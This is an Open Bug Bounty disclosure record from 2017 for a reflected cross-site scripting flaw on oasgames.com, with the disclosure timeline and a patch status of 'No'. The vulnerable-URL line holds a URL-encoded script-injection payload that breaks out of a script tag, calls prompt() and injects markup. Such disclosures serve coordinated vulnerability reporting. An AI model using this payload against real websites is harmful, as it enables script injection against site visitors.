oasgames.com XSS vulnerability

2017-04-05T18:23:00
ID OBB:223215
Type openbugbounty
Reporter xmenik
Modified 2017-04-12T19:14:00

Description

Vulnerable URL:
http://www.oasgames.com/lp/narutoes/lp.php?sp_promote=es;naruto_es;es;g;Display-ICM%20%3C/script%3E%22%3E%3Cscript%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E%20%3Ch1%3E%20OPENBUGBOUNTY%20%3C/h1%3E
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 28.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2593
VIP website status:| Yes

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 5 April, 2017 18:23 GMT
Generic security notifications sent to website owner| 5 April, 2017 18:25 GMT
Notification sent to subscribers (without technical details)| 5 April, 2017 22:17 GMT
Vulnerability details disclosed by researcher| 12 April, 2017 19:14 GMT